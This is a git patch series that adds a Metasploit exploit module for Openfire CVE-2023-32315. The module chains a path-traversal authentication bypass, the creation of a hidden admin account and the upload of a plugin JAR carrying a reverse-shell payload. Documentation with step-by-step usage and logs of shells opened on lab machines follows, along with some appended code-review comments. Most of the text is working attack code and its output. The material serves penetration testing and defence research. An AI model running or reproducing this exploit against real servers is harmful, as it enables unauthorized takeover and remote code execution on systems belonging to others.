From 8edbf73b6f751e3692d727f4747c2e7b2597a0a6 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Sat, 8 Jul 2023 09:48:17 +0000 Subject: [PATCH 1/7] first release exploit module --- data/exploits/CVE-2023-32315/changelog.html | 69 +++++ .../CVE-2023-32315/lib/plugin-metasploit.jar | Bin 0 -> 1813 bytes data/exploits/CVE-2023-32315/logo_large.gif | Bin 0 -> 1545 bytes data/exploits/CVE-2023-32315/logo_small.gif | Bin 0 -> 1021 bytes data/exploits/CVE-2023-32315/plugin.xml | 10 + data/exploits/CVE-2023-32315/readme.html | 69 +++++ ...openfire_auth_bypass_rce_cve_2023_32315.rb | 275 ++++++++++++++++++ 7 files changed, 423 insertions(+) create mode 100755 data/exploits/CVE-2023-32315/changelog.html create mode 100755 data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar create mode 100755 data/exploits/CVE-2023-32315/logo_large.gif create mode 100755 data/exploits/CVE-2023-32315/logo_small.gif create mode 100755 data/exploits/CVE-2023-32315/plugin.xml create mode 100755 data/exploits/CVE-2023-32315/readme.html create mode 100644 modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb diff --git a/data/exploits/CVE-2023-32315/changelog.html b/data/exploits/CVE-2023-32315/changelog.html new file mode 100755 index 0000000000..a7d5a78f98 --- /dev/null +++ b/data/exploits/CVE-2023-32315/changelog.html @@ -0,0 +1,69 @@ + + + + + Example plugin changelog + + + + +

+Example plugin +

+ +

Todo

+ +

+Add changelog content here +

+ + diff --git a/data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar b/data/exploits/CVE-2023-32315/lib/plugin-metasploit.jar new file mode 100755 index 0000000000000000000000000000000000000000..5c3b0bec461580702d6d72e244e139e37435fb7d GIT binary patch literal 1813 zcmWIWW@h1H0D(OlZaRP&P=b?zg~8V~#8KDN&rSc|DF%iBpi&VA4j|l(rc?x|1+LWB z(a+P(H8@1i*X^_KnbSVrx_TFRy>+$DojJcb$l!|cgQrDjoP`Q?Jbcc1gfet7s-FGg zQ?YYScaX4mP;kjyt+gUOJYRT9CiC!$nlyQT7O63w-2JIryW2acxLefb^Q5mPl{+hT z0$sz-!7gx_D+XwH8W4kAhutGAK-uK{Tz%Xsc%Uj$D-v@Ha#HcA6h%{+Uyz!YmRW>P ziwrI;1v#bZnR#H#Ai;_r1DXVMx7kD4B z^SoTDGBcuX&%U^ICbO1aEnO7;`s|}u&lEI6U-LZf?~*?H%&TyiRH)8Lx8lQ`hiTqrHXrAdS1tUI;$KqEq`D{WMm~G&dYcE5=W@F>!aglXt9YeS z_x`g%l7z6A=TQSCkL*Rdk7g+eipm@KWN&8VZ?-@3I`wh&A4&Z;r}#Y2y|}|&x!pH6 zYLPhmB&}ulH(gz8d$G$u@M{F?-EWz%6uMm76|X+r)qM3~>^-q3C*F3oXG-Nu}ncgbfe zo87n0SR8FS`z&v^(e&D1dTZBLX#TdpHUHlFX*(y&D%qd$sPlNpxoqR=CwBLZR`H!X zSZc8H;K6XdWhOq^7V8t4wl!PUJXUDWmyJ1G%RYU>lLt!sq>sniT==lJP2NPr^v{Y! z%VyRoMj8v&JWOPh3p4s5VxRiKGVJ9cozuCyl>Ca0u)giro94fG#TV;nC(|viwevO| zJF=BgGk3jNJ?+BcgQc&wF}TUkGSSO^{pI4$HFsxw+%_&W>I~+5KV!zC(k-rs zc&k2X7a=_Qdnftt%h0{}5Wd?B#-q=hi)bedNUPA5B|c z)a@&*yFO##|H$jx{dS~v&geZeyVW{mZTr?vS`g)0J(i z9R1HMvEQxvx$Nv#pD+BqpO#5x%_^A1RwZX_@~-lbOxnu?y?~>_kKbJX4=!PX+m$8+ zF*7iTv4Kh$MkX!>>}3q7utWv$@(@yVGBSxUAPP_9f(ul5B7ioK3D=5Ll;X1-)#{T# z6ClMMZs&puJOp?RWP)@cia*>sK?NWJh%%z;L@Ew(8v!a15x@hN5%A&>5pVJeaip< literal 0 HcmV?d00001 
diff --git a/data/exploits/CVE-2023-32315/logo_large.gif b/data/exploits/CVE-2023-32315/logo_large.gif new file mode 100755 index 0000000000000000000000000000000000000000..d1474a1a34ec07d5a4525a4279b58e403cdd6b81 GIT binary patch literal 1545 zcmV+k2KMb__vo4nTAO zMR5Q{cMd{t07i2FMScKAcmYRw6GC>T$B-5ixgLp09}NR!BKkE%+T#$}VTcao@On7w(Fs%n_G zdzP(onzVhGu6LWSSESN-pt_BuwQZ};Xsp$hsI+si)RL;Zfv(Pqt;3nDxQDdWjl0{4 zz~8OG&A7nGs>a>5#mlY9;J3=x!OGIb%FV*l*~-(~zSii~+T6$A@yp-q*WKUD;O))g z?%Uwv;Nsuiy*5~ct<>%<*;^yP%gVF?^W*IF z@9OC4?CIz2@9^vC=kNIQ?dy_{Qv*|A^8LW3IP8AEC2ui03ZM$000R70RIUbNU)&6g9sBUTxhVyjvYaQ7%@`g zLkJ2K96Xr7@PrE&H6%8Pazu-hEm2CWSRn!gMhY4xARth1go=+baQrB;Ws8_EK)1jc z+Tz6umkt~-P{828KpHM~L<$9}6sR+0_WT)yXwQ@>ONQ8ZA;piLIdgO)^i$4r_Up0Kq`mu{ae0S^Wm$*~2U+{fQuT{@-86eLJ|%;b8PjvP5} z^=K8qFpvn5FODBSMz#vpD^#LBJ(K6Twmn-3J`6l^L``bda;@=_#i|yz&b2+)v!$TJ zKq_1Ir~|H=-mhZpkdr%CyB@9v90vZ1$%1IQ+-}o=>k~JQTsU#@mTgo1y~MyXU<#S{ zH*G^OevjefO*rJlvkfUGc%z&y5|A(u9c?7C-!)!vFv>l02}sU7#w=if9<|N0%LOYu z*ajo(Jf_VejF{1dGX4lyjU*5(am6MCZa88J55|GwW7#-@$t8Hq5+ga$2*Cv#Uu+WM zh%fY*NQ!c0(+DPe9ZWjunTQueDbN{YObO(bnmhswm(m0RW|JZ6QbCDl zlF~#qSQA9>2D1?Xmtb)R v6!_dwL=#m+K?omoFo4nreFV}86JX!~TT~~+0t+A@z(ChNdjJ5{0RaFzn2Vpj literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2023-32315/logo_small.gif b/data/exploits/CVE-2023-32315/logo_small.gif new file mode 100755 index 0000000000000000000000000000000000000000..e1816427d7f0f06678304148b345f4bd4821c1be GIT binary patch literal 1021 zcmZ?wbhEHb6krfwc;3svpc%@dJf39?-ff&-b)4P}oIW+2zO|gbON~zx^$yh}^|psBQJ(#aj<=K6GZmiANicURrVd&cV}{ z4xYJk_R5Xxx9{D#d++Z32M-=Tc=+()qsNaQKLLT;FF!wc{proiXD?s9diUzZyVoz@ zy?*uS-Rn0WK7af4_S5%YzyJLG0|bBn{`vdw?>`XuKMH6Q0*XIb7`Yh!Gw3h?0Vq!} zaNJ_}&ne@v;lTkuCBFp`2b~VFu=DT;dWhlPhxQA4$x@1kKDTqu zv?=1_&{6u*Gg-U$UBHcvY}w3>E@Gxe#;M-Q*3L~U4(@VL;B(GiUXb}jz2lBet^h|1 zWBS@DT8SGZUN)*-n9jwN{^CXOGfxo>hngK8ho3PzO6sps2wddi+Qsk7CGqFFQX8+d blu1m(hA4#&0c9bL6|onb8m=-jGFSru_waN@ literal 0 HcmV?d00001 
diff --git a/data/exploits/CVE-2023-32315/plugin.xml b/data/exploits/CVE-2023-32315/plugin.xml new file mode 100755 index 0000000000..7769df7049 --- /dev/null +++ b/data/exploits/CVE-2023-32315/plugin.xml @@ -0,0 +1,10 @@ + + + com.example.openfire.plugin.Example + PLUGINNAME + PLUGINDESCRIPTION + PLUGINAUTHOR + 1.0.0 + 7/7/2008 + 3.5.0 + diff --git a/data/exploits/CVE-2023-32315/readme.html b/data/exploits/CVE-2023-32315/readme.html new file mode 100755 index 0000000000..8d1da45937 --- /dev/null +++ b/data/exploits/CVE-2023-32315/readme.html @@ -0,0 +1,69 @@ + + + + + Example plugin readme + + + + +

+Example plugin +

+ +

Todo

+ +

+Add readme content here +

+ + diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb new file mode 100644 index 0000000000..dfe2154527 --- /dev/null +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb 
@@ -0,0 +1,275 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Openfire authentication bypass with RCE plugin',
+ 'Description' => %q{
+ Openfire is an XMPP server licensed under the Open Source Apache License.
+ Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack
+ via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment
+ in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for
+ administrative users.
+ This module will use the vulnerability to create a new admin user that will be used to upload a Openfire management plugin
+ weaponised with java native payload that triggers an RCE.
+ This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.
+ The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the
+ first version on the 4.8 branch, which is version 4.8.0.
+ },
+ 'Author' => [
+ 'h00die-gr3y ' # Metasploit module
+ ],
+ 'References' => [
+ ['CVE', '2023-32315'],
+ ['URL', 'https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-32315'],
+ ['URL', 'https://github.com/miko550/CVE-2023-32315'],
+ ['URL', 'https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => [ 'java' ],
+ 'Privileged' => false,
+ 'Arch' => [ ARCH_JAVA ],
+ 'Targets' => [
+ [
+ 'Java Universal',
+ {
+ 'Platform' => 'java',
+ 'Arch' => ARCH_JAVA,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'java/shell/reverse_tcp'
+ }
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2023-05-26',
+ 'DefaultOptions' => {
+ 'SSL' => false,
+ 'RPORT' => 9090
+ },
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+ 'Reliability' => [REPEATABLE_SESSION]
+ }
+ )
+ )
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+ OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
+ OptString.new('PLUGINAUTHOR', [ false, 'Openfire plugin author, (default: random)' ]),
+ OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
+ OptString.new('ADMINNAME', [ false, 'Openfire admin user name, (default: random)' ]),
+ ]
+ )
+ end
+
+ def get_version
+ # get Openfire version number from the admin console login page
+ openfire = {}
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'login.jsp'),
+ 'ctype' => 'application/x-www-form-urlencoded'
+ })
+ if res && res.code == 200
+ version = res.body.match(/Openfire,\s*\D*:\s*\d\.\d{1,2}\.\d/)
+ openfire['version'] = version[0].split(':')[1].strip unless version.nil?
+ end
+ return openfire
+ end
+
+ def auth_bypass
+ # bypass authentication using path traversal vulnerability and return true if cookie_jar is filled (JSESSION-ID and CSRF) else return false.
+ send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'setup', 'setup-s', '%u002e%u002e/%u002e%u002e/user-groups.jsp'),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'keep_cookies' => true
+ })
+ if cookie_jar.cookies.empty?
+ return false
+ else
+ cookie_jar.cookies.each do |cookie|
+ print_status(cookie.to_s)
+ end
+ return true
+ end
+ end
+
+ def add_admin_user
+ # add an admin user using path traversal vulnerability using the cookies retrieved from authentication bypass.
+ # returns admin login hash with random generated username and password
+ @admin_login = {}
+ username = datastore['ADMINNAME'] || Rex::Text.rand_text_alpha_lower(8..15)
+ password = Rex::Text.rand_password(8..10)
+ cookie_jar.cookies.each do |cookie|
+ @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil?
+ end
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'setup', 'setup-s', '%u002e%u002e/%u002e%u002e/user-create.jsp'),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'keep_cookies' => true,
+ 'vars_get' => {
+ 'csrf' => @csrf_token.to_s,
+ 'username' => username.to_s,
+ 'password' => password.to_s,
+ 'passwordConfirm' => password.to_s,
+ 'isadmin' => 'on',
+ 'create' => '\xe5\x88\x9b\xe5\xbb\xba\xe7\x94\xa8\xe6\x88\xb7'
+ }
+ })
+ # path traversal throws a java exception error 500 and/or returns a 200 OK code despite if the user is added or not
+ # we have to check during the login of the new admin user if we have been successful here
+ if res && res.code == 200 || res.code == 500
+ @admin_login['username'] = username
+ @admin_login['password'] = password
+ end
+ return @admin_login
+ end
+
+ def login_admin_user
+ # login using admin hash with admin username and password
+ # returns true if login successful else returns false
+ cookie_jar.cookies.each do |cookie|
+ @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil?
+ end
+
+ res = send_request_cgi!({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'login.jsp'),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'keep_cookies' => true,
+ 'vars_post' => {
+ 'url' => '%2Findex.jsp',
+ 'login' => 'true',
+ 'csrf' => @csrf_token.to_s,
+ 'username' => @admin_login['username'].to_s,
+ 'password' => @admin_login['password'].to_s
+ }
+ })
+ if res && res.code == 200 && res.body.match(/login box/).nil?
+ return true
+ else
+ return false
+ end
+ end
+
+ def prepare_plugin_jar
+ # prepares the plugin foundation that will host the payload
+ files = [
+ [ 'logo_large.gif' ],
+ [ 'logo_small.gif' ],
+ [ 'readme.html' ],
+ [ 'changelog.html' ],
+ [ 'lib', 'plugin-metasploit.jar' ]
+ ]
+
+ jar = Rex::Zip::Jar.new
+ jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315'))
+
+ @plugin_name = datastore['PLUGINNAME'] || Rex::Text.rand_text_alphanumeric(8..15)
+ plugin_author = datastore['PLUGINAUTHOR'] || Rex::Text.rand_text_alphanumeric(8..15)
+ plugin_desc = datastore['PLUGINDESC'] || Rex::Text.rand_text_alphanumeric(8..15)
+
+ plugin_xml = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml'), 'rb', &:read)
+ plugin_xml.gsub!(/PLUGINNAME/, @plugin_name)
+ plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
+ plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
+
+ jar.add_file('plugin.xml', plugin_xml)
+ return jar
+ end
+
+ def upload_and_execute_plugin(plugin_jar)
+ # upload and execute Openfire plugin with encoded payload
+ # returns true if upload is successful else returns false
+
+ # construct multipart form data
+ form_data = Rex::MIME::Message.new
+ form_data.add_part(plugin_jar.to_s, 'application/x-java-archive', 'binary', "form-data; name=\"uploadfile\"; filename=\"#{@plugin_name}.jar\"")
+
+ # extract the csrf token
+ cookie_jar.cookies.each do |cookie|
+ @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil?
+ end
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'plugin-admin.jsp'),
+ 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+ 'keep_cookies' => true,
+ 'data' => form_data.to_s,
+ 'vars_get' => {
+ 'uploadplugin' => nil,
+ 'csrf' => @csrf_token.to_s
+ }
+ })
+ # with a successfull upload and execution of the plugin, no response is returned.
+ return true unless res
+ # safety check if, for whatever reason, we get a 302 response back
+ if res.code == 302 && res.headers.to_s.match(/uploadsuccess=true/)
+ return true
+ else
+ return false
+ end
+ end
+
+ def check
+ openfire = get_version
+ return CheckCode::Safe if openfire.empty?
+ # check first for patched versions
+ return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8') || Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5')
+
+ if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0')
+ CheckCode::Vulnerable("Openfire version is #{openfire['version']}")
+ else
+ CheckCode::Safe("Openfire version is #{openfire['version']}")
+ end
+ end
+
+ def exploit
+ # gain access exploiting path traversal vulnerability
+ print_status('Grabbing the cookies.')
+ fail_with(Failure::NoAccess, 'Authentication bypass is not successful.') unless auth_bypass
+
+ # add a new admin user
+ print_status('Adding a new admin user.')
+ fail_with(Failure::NoAccess, 'Adding a new admin user is not successful.') if add_admin_user.empty?
+
+ # login with new admin account
+ print_status("Logging in with admin user \"#{@admin_login['username']}\" and password \"#{@admin_login['password']}\".")
+ fail_with(Failure::NoAccess, 'Login is not successful.') unless login_admin_user
+
+ # prepare Openfire plugin with payload
+ plugin = prepare_plugin_jar
+ plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
+ plugin.build_manifest
+
+ # upload and execute Openfire plugin with payload
+ print_status("Upload and execute plugin \"#{@plugin_name}\" with payload \"#{datastore['PAYLOAD']}\".")
+ fail_with(Failure::PayloadFailed, 'Upload and/or execution of the plugin is not successful.') unless upload_and_execute_plugin(plugin.pack)
+
+ # cover our tracks!!!
+ # remove plugin and newly added admin user
+ # Automatic removal of plugin and admin user might cause instability in the application,
+ # so remove it manually in Openfire Management console after the exploit is completed.
+ print_warning("Plugin \"#{@plugin_name}\" need manually clean-up via Openfire Admin console.")
+ print_warning("Admin user \"#{@admin_login['username']}\" need manually clean-up via Openfire Admin console.")
+ end
+end
From a3ea55f2a6b23dded0055bfbe8bdbd92e2c3b90a Mon Sep 17 00:00:00 2001
From: h00die-gr3y
Date: Sat, 8 Jul 2023 12:30:54 +0000
Subject: [PATCH 2/7] added documentation
---
...openfire_auth_bypass_rce_cve_2023_32315.md | 190 ++++++++++++++++++
1 file changed, 190 insertions(+)
create mode 100644 documentation/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.md
diff --git a/documentation/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.md b/documentation/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.md
new file mode 100644
index 0000000000..943856b49c
--- /dev/null
+++ b/documentation/modules/exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315.md
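Review bot: In `add_admin_user` the status test `if res && res.code == 200 || res.code == 500` parses as `(res && res.code == 200) || res.code == 500`, so a request that times out (`res` is nil) raises NoMethodError instead of returning the empty hash that `exploit` tests with `add_admin_user.empty?`. Grouping the accepted codes keeps the nil guard in force: `if res && [200, 500].include?(res.code)`. The same condition is carried unchanged as a context line in the `@@ -131,11 +129,11 @@` hunk of PATCH 3/7. The purpose comments sit inside each method body; placing them above the `def` lines would match the usual Ruby documentation layout.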
@@ -0,0 +1,190 @@ +## Vulnerable Application +`Openfire's` administrative console, a web-based application, was found to be vulnerable to a path traversal attack +via the setup environment using the path `http://localhost:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/`. +Endpoints such as `log.jsp`, `user-groups.jsp` and `user-create.jsp` can be used to gain unauthorized admin access. +It allows an unauthenticated user to use the unauthenticated `Openfire` Setup Environment in an already configured +`Openfire` environment to access restricted pages in the `Openfire Admin Console` reserved for administrative users. + +This module will use the vulnerability to create a new admin user that will be used to upload a `Openfire` management plugin +weaponized with a `Java` native payload that triggers an RCE. +The vulnerability affects all versions of `Openfire` that have been released since April 2015, starting with version `3.10.0`. +The problem has been patched in `Openfire` release `4.7.5` and `4.6.8`, and further improvements will be included +in the first version on the `4.8` branch, which is version `4.8.0`. + +This module has been tested on: +- [ ] Ubuntu Linux 22.04. +* Openfire 3.10.1, 4.0.4, 4.1.0, 4.2.0, 4.3.0, 4.4.0, 4.5.0, 4.6.0. 
4.7.0, 4.7.1, 4.7.3 +* Java 7, 8, 17 +- [ ] Windows Server 2019 Datacenter +* Openfire 4.7.3 +* Java 20 + +**Instructions for an Openfire installation:** +Download Openfire releases [here](https://github.com/igniterealtime/Openfire/releases?page=1) +Follow installation instructions [here](https://download.igniterealtime.org/openfire/docs/latest/documentation/install-guide.html) + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315` +- [ ] `set rhosts ` +- [ ] `set rport ` +- [ ] `set target <0=Java Universal>` +- [ ] `exploit` +- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings + +``` +msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > options + +Module options (exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + ADMINNAME no Openfire admin user name, (default: random) + PLUGINAUTHOR no Openfire plugin author, (default: random) + PLUGINDESC no Openfire plugin description, (default: random) + PLUGINNAME no Openfire plugin base name, (default: random) + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 9090 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + TARGETURI / yes The base path to the web application + VHOST no HTTP server virtual host + + +Payload options (java/shell/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Java Universal +``` + +## Options + +### TARGETURI +The uripath to the `Openfire Admin Console`. 
Default set to `/` which is the standard for `Openfire`. + +### ADMINNAME +`Openfire` admin user name option to create a new admin user. User name will be randomized if not set. + +### PLUGINAUTHOR +`Openfire` plugin author to set the name of the plugin author. Author name will be randomized if not set. + +### PLUGINDESC +`Openfire` plugin description to update the description of the plugin. Description will be randomized if not set. + +### PLUGINNAME +`Openfire` plugin name to set the plugin name. Plugin name will be randomized if not set. + +## Scenarios +### Ubuntu 22.04 - Openfire 4.7.0 - java/meterpreter/reverse_tcp +``` +msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit + +[*] Started reverse TCP handler on 192.168.201.10:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. Openfire version is 4.7.0 +[*] Grabbing the cookies. +[*] JSESSIONID=node010hllcuuhb19x13etracg8jjxk24.node0 +[*] csrf=Lc9ZXFTo6H3bnC1 +[*] Adding a new admin user. +[*] Logging in with admin user "jdajefap" and password "W3EozCK8Nx". +[*] Upload and execute plugin "U6zVD3dY" with payload "java/meterpreter/reverse_tcp". +[*] Sending stage (58851 bytes) to 192.168.201.59 +[*] Meterpreter session 33 opened (192.168.201.10:4444 -> 192.168.201.59:60420) at 2023-07-08 10:33:16 +0000 +[!] Plugin "U6zVD3dY" need manually clean-up via Openfire Admin console. +[!] Admin user "jdajefap" need manually clean-up via Openfire Admin console. 
+ +meterpreter > getuid +Server username: openfire +meterpreter > sysinfo +Computer : cuckoo +OS : Linux 5.15.0-76-generic (amd64) +Architecture : x64 +System Language : en_US +Meterpreter : java/linux +meterpreter > +``` +### Windows Server 2019 Datacenter - Openfire 4.7.3 - java/shell/reverse_tcp +``` +msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > exploit + +[*] Started reverse TCP handler on 192.168.201.10:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. Openfire version is 4.7.4 +[*] Grabbing the cookies. +[*] JSESSIONID=node01dr68xhv8giop14zogvh0ycnt13.node0 +[*] csrf=mRz62R9hab6YAgt +[*] Adding a new admin user. +[*] Logging in with admin user "qkcvdmmevuvw" and password "tO0gWgDrM4". +[*] Upload and execute plugin "XZl3TKb1ayogynR" with payload "java/shell/reverse_tcp". +[*] Sending stage (2952 bytes) to 192.168.201.57 +[!] Plugin "XZl3TKb1ayogynR" need manually clean-up via Openfire Admin console. +[!] Admin user "qkcvdmmevuvw" need manually clean-up via Openfire Admin console. +[*] Command shell session 32 opened (192.168.201.10:4444 -> 192.168.201.57:50171) at 2023-07-08 10:31:01 +0000 + + +Shell Banner: +Microsoft Windows [Version 10.0.17763.107] +----- + + +C:\Program Files\Openfire\bin>systeminfo +systeminfo + +Host Name: WIN-HHRQENPDSRS +OS Name: Microsoft Windows Server 2019 Datacenter +OS Version: 10.0.17763 N/A Build 17763 +OS Manufacturer: Microsoft Corporation +OS Configuration: Standalone Server +OS Build Type: Multiprocessor Free +Registered Owner: Windows User +Registered Organization: +Product ID: 00430-00000-00000-AA500 +Original Install Date: 1/23/2023, 4:51:06 AM +System Boot Time: 7/8/2023, 2:16:23 AM +System Manufacturer: innotek GmbH +System Model: VirtualBox +System Type: x64-based PC +Processor(s): 1 Processor(s) Installed. 
+ [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2306 Mhz +BIOS Version: innotek GmbH VirtualBox, 12/1/2006 +Windows Directory: C:\Windows +System Directory: C:\Windows\system32 +Boot Device: \Device\HarddiskVolume1 +System Locale: en-us;English (United States) +Input Locale: en-us;English (United States) +Time Zone: (UTC-08:00) Pacific Time (US & Canada) +Total Physical Memory: 2,048 MB +Available Physical Memory: 728 MB +Virtual Memory: Max Size: 3,469 MB +Virtual Memory: Available: 1,523 MB +Virtual Memory: In Use: 1,946 MB +Page File Location(s): C:\pagefile.sys +Domain: WORKGROUP +Logon Server: N/A +Hotfix(s): 1 Hotfix(s) Installed. + [01]: KB4464455 +Network Card(s): 1 NIC(s) Installed. + [01]: Intel(R) PRO/1000 MT Desktop Adapter + Connection Name: Ethernet + DHCP Enabled: Yes + DHCP Server: 192.168.201.1 + IP address(es) + [01]: 192.168.201.57 + [02]: fe80::b089:6587:7273:231e +Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. + +C:\Program Files\Openfire\bin> +``` + +## Limitations +No limitations. From c34779a5f156a7f03892626ea35ed338dbeced51 Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Sun, 9 Jul 2023 12:20:58 +0000 Subject: [PATCH 3/7] updates based on comments of jvoisin and adfoster-r7 --- ...openfire_auth_bypass_rce_cve_2023_32315.rb | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb index dfe2154527..d0e72f336e 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb 
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2023-32315'], - ['URL', 'https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-32315'], + ['URL', 'https://attackerkb.com/topics/7Tf5YGY3oT/cve-2023-32315'], ['URL', 'https://github.com/miko550/CVE-2023-32315'], ['URL', 'https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm'] ], @@ -100,14 +100,12 @@ class MetasploitModule < Msf::Exploit::Remote 'ctype' => 'application/x-www-form-urlencoded', 'keep_cookies' => true }) - if cookie_jar.cookies.empty? - return false - else - cookie_jar.cookies.each do |cookie| - print_status(cookie.to_s) - end - return true + return false if cookie_jar.cookies.empty? + + cookie_jar.cookies.each do |cookie| + print_status(cookie.to_s) end + return true end def add_admin_user @@ -131,11 +129,11 @@ class MetasploitModule < Msf::Exploit::Remote 'password' => password.to_s, 'passwordConfirm' => password.to_s, 'isadmin' => 'on', - 'create' => '\xe5\x88\x9b\xe5\xbb\xba\xe7\x94\xa8\xe6\x88\xb7' + 'create' => 'Create+User' } }) - # path traversal throws a java exception error 500 and/or returns a 200 OK code despite if the user is added or not - # we have to check during the login of the new admin user if we have been successful here + # path traversal throws a java exception error 500 and/or returns a 200 OK code not matter if the user is added or not, + # so we have to check during the login of the new admin user if we have been successful here if res && res.code == 200 || res.code == 500 @admin_login['username'] = username @admin_login['password'] = password 
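Review bot: In the `@@ -100,14 +100,12 @@` hunk, `auth_bypass` still writes every cookie to the console with `print_status(cookie.to_s)`, so the live `JSESSIONID` and `csrf` values end up in any spool or log of the run. `vprint_status(cookie.to_s)` would limit them to verbose output. The new guard `return false if cookie_jar.cookies.empty?` also accepts any cookie as success, while the later methods read only the `csrf=` cookie, so the presence test could name that cookie. The trailing `return true` can be a bare `true`.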
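Review bot: The reworded comment in the `@@ -131,11 +129,11 @@` hunk reads `returns a 200 OK code not matter if the user is added or not`; `not matter` should be `no matter`, for example `# the request answers 500 (Java exception) or 200 whether or not the user was created,`. The new value `'create' => 'Create+User'` is presumably URL-encoded by the HTTP client when passed through `vars_get`, in which case the `+` is sent as a literal plus sign rather than a space; `'Create User'` would state the intended value directly. `add_admin_user` starts and ends outside the hunk.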
